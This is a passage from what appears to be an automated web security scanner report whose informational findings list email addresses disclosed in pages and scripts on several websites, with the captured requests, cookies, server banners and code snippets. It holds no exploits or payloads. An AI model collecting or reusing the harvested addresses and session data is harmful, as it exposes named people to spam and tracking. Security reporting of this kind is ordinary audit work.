Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 27 Jul 2010 08:13:44 GMT
ETag: "c5d02b8-2f12-48c5a15d3f400"
Accept-Ranges: bytes
Content-Length: 12050
Content-Type: text/css

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/

/* Typography
---------------------------------------------------------------*/
/* Code */
pre,
.code1,
.code2{
   margin:10px 0 15p
...[SNIP]...

26.106. http://www.positivesearchresults.com/templates/gk_corporate/lib/scripts/template_scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/lib/scripts/template_scripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/gk_corporate/lib/scripts/template_scripts.js HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 18 Jun 2010 01:52:58 GMT
ETag: "c5d02ac-ecc-48944384a0880"
Accept-Ranges: bytes
Content-Length: 3788
Content-Type: application/javascript

/*--------------------------------------------------------------
# Corporate - April 2009 (for Joomla 1.5)
# Copyright (C) 2007-2009 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
---------------------------------------------------------------*/


window.addEvent("domready",function(){
   var $b = $(document.getElementsByTagName('body')[0]);
   // smoothscroll init
   new SmoothScr
...[SNIP]...

26.107. https://www.privacyguard.com/secure/promo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/promo.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /secure/promo.aspx?lyr=promoLyr1 HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
Referer: http://www.privacyguard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.1.10.1303674285; hasCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 21166
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:21:04 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 8:21:04 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...
ial and $14.99 monthly membership fee will be billed to the credit or debit card (or to the related checking account) you provide. If you wish to cancel, you can call toll free 1-800-374-8273 or email service@privacyguard.com or click the cancel link on the Customer Center page at www.privacyguard.com. You can cancel your benefits at any time and you will not be billed for any additional months. You will be notified of any
...[SNIP]...

26.108. http://www.senasystems.com/about/locations.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.senasystems.com
Path:   /about/locations.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/locations.html HTTP/1.1
Host: www.senasystems.com
Proxy-Connection: keep-alive
Referer: http://www.senasystems.com/services/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=46554149.1303674299.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46554149.861233946.1303674299.1303674299.1303674299.1; __utmc=46554149

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 20:39:11 GMT
Content-Type: text/html
Connection: keep-alive
Last-Modified: Thu, 03 Feb 2011 05:47:31 GMT
ETag: "811dfe-1892-49b5a4d2d02c0"
Content-Length: 6290

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content=
"text/html; charset=utf-8">
<base
...[SNIP]...
<a href=
"mailto:info@senasystems.com?cc=info-usa@aurionpro.com%20&amp;subject=Web%20Inquiry">
info@senasystems.com</a>
...[SNIP]...
<a href=
"mailto:info@senasystems.com?cc=info-usa@aurionpro.com%20&amp;subject=Web%20Inquiry">
info@senasystems.com</a><br>
Email: <a href=
"mailto:info-usa@aurionpro.com?subject=Web%20Inquiry">info-usa@aurionpro.com</a>
...[SNIP]...
<a href=
"mailto:info@senasystems.com?subject=Web%20Inquiry">
info@senasystems.com</a>
...[SNIP]...
<a href=
"mailto:info@senasystems.com?subject=Web%20Inquiry">
info@senasystems.com</a>
...[SNIP]...
<a href=
                           "mailto:info@senasystems.com?subject=Web%20Inquiry">
info@senasystems.com</a>
...[SNIP]...
<a href=
"mailto:info@aurionpro.com?subject=Web%20Inquiry">
info@aurionpro.com</a>
...[SNIP]...

26.109. https://www.senderscore.org/landing/ppcregistration/include/gen_validatorv31.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/include/gen_validatorv31.js

Issue detail

The following email address was disclosed in the response:

Request

GET /landing/ppcregistration/include/gen_validatorv31.js HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
Referer: https://www.senderscore.org/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campid=701000000005Ucl; ss_lookup=osci4fep75ko01fvibcjgf03n3; BIGipServerw3pub=3372373002.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:51:20 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Tue, 19 Oct 2010 22:24:19 GMT
ETag: "52817a-4896-492ffc0fd8ac0"
Accept-Ranges: bytes
Content-Length: 18582
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/*
-------------------------------------------------------------------------
        JavaScript Form Validator (gen_validatorv31.js)
Version 3.1
   Copyright (C) 2003-2008 JavaScript-Cod
...[SNIP]...
tion script is distributed free from JavaScript-Coder.com
   For updates, please visit:
   http://www.javascript-coder.com/html-form/javascript-form-validation.phtml
   
   Questions & comments please send to support@javascript-coder.com
-------------------------------------------------------------------------
*/
function Validator(frmname)
{
this.formobj=document.forms[frmname];
   if(!this.formobj)
   {
    alert("Error: couldnot g
...[SNIP]...

26.110. http://www.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zgozx2vojaovd445odimduvm; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:57 GMT
Content-Length: 38062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Home : The
...[SNIP]...
<a href="http://forums.silverlight.net/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com">
...[SNIP]...
4212011-001" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392426000000000&cdn_id=04212011-001');" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="http://forums.silverlight.net/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.111. http://www.silverlight.net/privacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /privacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:20 GMT
Content-Length: 19694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Privacy St
...[SNIP]...
<a href="mailto:mc_feedback_silverlightnet@neudesic.com">mc_feedback_silverlightnet@neudesic.com </a>
...[SNIP]...

26.112. http://www.silverlight.net/termsofuse.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /termsofuse.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /termsofuse.aspx HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:41 GMT
Content-Length: 50430


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Terms Of U
...[SNIP]...
<a href="mailto:homepage@microsoft.com" mce_href="mailto:homepage@microsoft.com">homepage@microsoft.com</a>
...[SNIP]...
<a href="mailto:webmaster@msn.com" mce_href="mailto:webmaster@msn.com">webmaster@msn.com</a>
...[SNIP]...
<a href="mailto:support@hotmail.com" mce_href="mailto:support@hotmail.com">support@hotmail.com</a>
...[SNIP]...
<a href="mailto:abuse@hotmail.com" mce_href="mailto:abuse@hotmail.com">abuse@hotmail.com</a> or <a href="mailto:hotmailprivacy@hotmail.com" mce_href="mailto:hotmailprivacy@hotmail.com">hotmailprivacy@hotmail.com</a>
...[SNIP]...
<a href="mailto:piracy@microsoft.com" mce_href="mailto:piracy@microsoft.com">piracy@microsoft.com</a>
...[SNIP]...

26.113. http://www.swisscom.ch/FxRes/asp/sitecatalyst/s_code_bw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /FxRes/asp/sitecatalyst/s_code_bw.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FxRes/asp/sitecatalyst/s_code_bw.js HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://de.swisscom.ch/privatkunden
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:49:47 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: Apache=173.193.214.243.167121303670987960; path=/
Content-Length: 37996
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Jan 2009 14:15:36 GMT
Accept-Ranges: bytes
ETag: "3c6f3566407ac91:18ffa9"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

/* SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm"
+"('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@h;`l@h`L^9,`G$61',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$w)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Btc=1;s.flush`a()}`2$l`Atl`0o,t,n,"
+"vo`1;s.@G=@vo`R`N^M=t;s.`N`i=n;s.t(@h}`5pg){`F@0co`0o){`K@J\"_\",1,#A`2@vo)`Awd@0gs`0$S{`K@J$o1,#A`2s.t()`Awd@0dc`0$S{`K@J$o#A`2s.t()}}@3=(`F`J`Y`8`4@ts@d0`Rd=^L
...[SNIP]...

26.114. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/jquery/custom/jquery.jqModal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Scripts/jquery/custom/jquery.jqModal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Swisscom.CorporatePortal.Web.RES/Scripts/jquery/custom/jquery.jqModal.js HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:21 GMT
Server: Microsoft-IIS/6.0
Content-Length: 3355
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Apr 2011 08:24:54 GMT
Accept-Ranges: bytes
ETag: "0cff843b4f9cb1:23672a"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

/*
* jqModal - Minimalist Modaling with jQuery
* (http://dev.iceburg.net/jquery/jqModal/)
*
* Copyright (c) 2007,2008 Brice Burgess <bhb@iceburg.net>
* Dual licensed under the MIT and GPL licen
...[SNIP]...

26.115. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/jquery/ui/jquery.bgiframe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Scripts/jquery/ui/jquery.bgiframe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Swisscom.CorporatePortal.Web.RES/Scripts/jquery/ui/jquery.bgiframe.js HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:12 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4879
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Apr 2011 08:25:42 GMT
Accept-Ranges: bytes
ETag: "079560b4f9cb1:18ff7d"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && /6.0/.test(navigator.userAgent) ) {
       s = $.extend({
           top : 'auto',
...[SNIP]...

26.116. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Scripts/s_code_fx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Scripts/s_code_fx.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Swisscom.CorporatePortal.Web.RES/Scripts/s_code_fx.js HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:23 GMT
Server: Microsoft-IIS/6.0
Content-Length: 41234
Content-Type: application/x-javascript
Last-Modified: Wed, 13 Apr 2011 08:25:28 GMT
Accept-Ranges: bytes
ETag: "0cc3c58b4f9cb1:18ff86"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

//-------------------------------------------------------
// Change History
//-------------------------------------------------------
//2009-July: integrated ButtonLinkhandler for Tracking
//2009
...[SNIP]...
av()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm"
+ "('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@h;`l@h`L^9,`G$61',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$w)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Btc=1;s.flush`a()}`2$l`Atl`0o,t,n,"
+ "vo`1;s.@G=@vo`R`N^M=t;s.`N`i=n;s.t(@h}`5pg){`F@0co`0o){`K@J\"_\",1,#A`2@vo)`Awd@0gs`0$S{`K@J$o1,#A`2s.t()`Awd@0dc`0$S{`K@J$o#A`2s.t()}}@3=(`F`J`Y`8`4@ts@d0`Rd=^
...[SNIP]...

26.117. http://www.swisscom.ch/Swisscom.CorporatePortal.Web.RES/Styles/swisscom-cicd.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swisscom.ch
Path:   /Swisscom.CorporatePortal.Web.RES/Styles/swisscom-cicd.css

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Swisscom.CorporatePortal.Web.RES/Styles/swisscom-cicd.css HTTP/1.1
Host: www.swisscom.ch
Proxy-Connection: keep-alive
Referer: http://www.swisscom.ch/res/hilfe/kontakt/index.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.167121303670987960; s_vnum=1306263001740%26vn%3D1; s_vi=[CS]v1|26DA3866851D25B3-6000012740522469[CE]; s_cc=true; CTQ=second; s_nr=1303671082855-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=level0%3Anone; s_visit=1; B=level0; s_sq=swisscom-onelive%3D%2526pid%253Dlevel0/en/privatkunden/63%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA; ASP.NET_SessionId=1hn0oa55wh0xxciu4mjibnvz; languageId=en

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:11 GMT
Server: Microsoft-IIS/6.0
Content-Length: 14307
Content-Type: text/css
Last-Modified: Wed, 13 Apr 2011 08:25:40 GMT
Accept-Ranges: bytes
ETag: "0da635fb4f9cb1:18ff7a"
X-Powered-By: ASP.NET
X-Cache: MISS from www.swisscom.ch

.../**
* @title Swisscom CICD Stylesheet
* @discritption    This file contains global elements for swisscom ci-cd
*                    sites and should be adapted in every swisscom web project.
*                    <stron
...[SNIP]...
</strong>
* @author matthias.jaeggli@orange8.com
**/

/*
IMPORTANT:
This file is propper commented and blown up in size. Therefore you have
to shrink this file with a CSS optimizer, essentially.
http://www.cssdrive.com/index.php/main/csscomp
...[SNIP]...
+
Date Version Description
+-------------+---------+-------------------------------------------------+
2009-06-12 1.0.11 Inserted standardbutton-back
matthias.jaeggli@orange8.com

2009-05-25 1.0.10 Expanded tree navigation deepness
matthias.jaeggli@orange8.com

2009-04-27 1.0.9 Tree-Navigation two line links
matthias.jaeggli@orange8.com
                       
2009-04-21 1.0.8 Several Bugfixes for IE6
matthias.jaeggli@orange8.com
                       
2009-04-14 1.0.7 Added Wide Layout Styles
matthias.jaeggli@orange8.com
                       
2009-04-08 1.0.6 Added Teserless Template Styles
oh@haraio.com

2009-04-08 1.0.5 Join of all the past cicd-css
matthias.jaeggli@orange8.com
                       
2009-04-01 1.0.4 Standardbutton alpha-transp. better fix, for IE6
matthias.jaeggli@orange8.com

2009-03-23 1.0.3 Second Nav are small links again
matthias.jaeggli@orange8.com
                       
2009-03-18 1.0.2 Added Sidebar-Teasers, Showroom, Content Block
matthias.jaeggli@orange8.com
                       
2009-02-02 1.0.1 Added alpha-transparency to standardbutton
corners
matthias.jaeggli@orange8.com
                       
2009-01-24 1.0.0 Final release
matthias.jaeggli@orange8.com
                       
2009-01-21 0.1.1 Replaceds some IDs because of the ASP.NET
convention of garaio
matthias.jaeggli@orange8.com
                       
2009-01-19 0.1.0 Frame: header, navigation and footer
matthias.jaeggli@orange8.com
+-------------+---------+-------------------------------------------------+
*/


/*-----------------------------------------------------------------------*/
/* Main Frame
...[SNIP]...

26.118. http://www.truecredit.com/shared/cncr/js/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truecredit.com
Path:   /shared/cncr/js/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/cncr/js/common.js HTTP/1.1
Host: www.truecredit.com
Proxy-Connection: keep-alive
Referer: http://www.truecredit.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
